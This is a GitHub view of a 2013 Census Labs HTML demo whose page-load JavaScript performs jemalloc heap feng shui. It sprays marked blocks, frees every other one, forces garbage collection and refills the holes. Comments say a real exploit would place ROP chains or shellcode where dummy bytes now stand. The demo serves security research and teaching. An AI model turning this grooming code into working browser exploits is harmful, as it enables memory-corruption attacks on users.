-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathjemalloc_feng_shui.html
145 lines (111 loc) · 3.39 KB
/
jemalloc_feng_shui.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
<html>
<head>
<script>
function jemalloc_feng_shui(blocks, size)
{
// Copyright (c) 2013 Patroklos Argyroudis <argp at domain census-labs.com>
// Copyright (c) 2013 Chariton Karamitas <huku at domain census-labs.com>
// Copyright (c) 2013 Census, Inc. (http://www.census-labs.com/)
var block_size = size / 2;
// construct the 0xdeadbeef blocks, in a real exploit this would be
// rop/bootstrap/whatever
var marker = unescape("%ubeef%udead");
marker += marker;
// shellcode/payload
var content = unescape("%u6666%u6666");
while(content.length < (block_size / 2))
{
content += content;
}
var arr = [];
// spray the 0xdeadbeef blocks
for(i = 0; i < blocks; i++)
{
// construct the random block padding (corelanc0d3r's trick)
var rnd1 = Math.floor(Math.random() * 1000) % 16;
var rnd2 = Math.floor(Math.random() * 1000) % 16;
var rnd3 = Math.floor(Math.random() * 1000) % 16;
var rnd4 = Math.floor(Math.random() * 1000) % 16;
var rndstr = "%u" + rnd1.toString() + rnd2.toString();
rndstr += "%u" + rnd3.toString() + rnd4.toString();
var padding = unescape(rndstr);
while(padding.length < block_size - marker.length - content.length)
{
padding += padding;
}
// construct the block
var block = marker + content + padding;
// if required repeat the block
while(block.length < block_size)
{
block += block;
}
// spray block
arr[i] = block.substr(0);
}
// for debugging
Math.asin(Math.random());
// free every other 0xdeadbeef block to create holes
// in the jemalloc 512 run
for(i = 0; i < blocks; i += 2)
{
delete(arr[i]);
arr[i] = null;
}
var ret = trigger_gc();
alert("After garbage collection: " + ret.length);
// construct the 0xcafebabe blocks
marker = unescape("%ubabe%ucafe");
marker += marker;
content = unescape("%u7777%u7777");
while(content.length < (block_size / 2))
{
content += content;
}
// spray the 0xcafebabe blocks with the goal of filling
// the previously created holes on the 512 run
for(i = 0; i < blocks; i += 2)
{
var rnd1 = Math.floor(Math.random() * 1000) % 16;
var rnd2 = Math.floor(Math.random() * 1000) % 16;
var rnd3 = Math.floor(Math.random() * 1000) % 16;
var rnd4 = Math.floor(Math.random() * 1000) % 16;
var rndstr = "%u" + rnd1.toString() + rnd2.toString();
rndstr += "%u" + rnd3.toString() + rnd4.toString();
var padding = unescape(rndstr);
while(padding.length < block_size - marker.length - content.length)
{
padding += padding;
}
var block = marker + content + padding;
while(block.length < block_size)
{
block += block;
}
arr[i] = block.substr(0);
}
// for debugging
Math.acos(Math.random());
return arr;
}
function trigger_gc()
{
var gc = [];
for(i = 0; i < 100000; i++)
{
gc[i] = new Array();
}
return gc;
}
function run_feng_shui()
{
// 1024 spray blocks of size 320 (target run size: 512)
var foo = jemalloc_feng_shui(1024, 320);
alert(foo.length);
}
</script>
</head>
<body onload="run_feng_shui();">
0x1337
</body>
</html>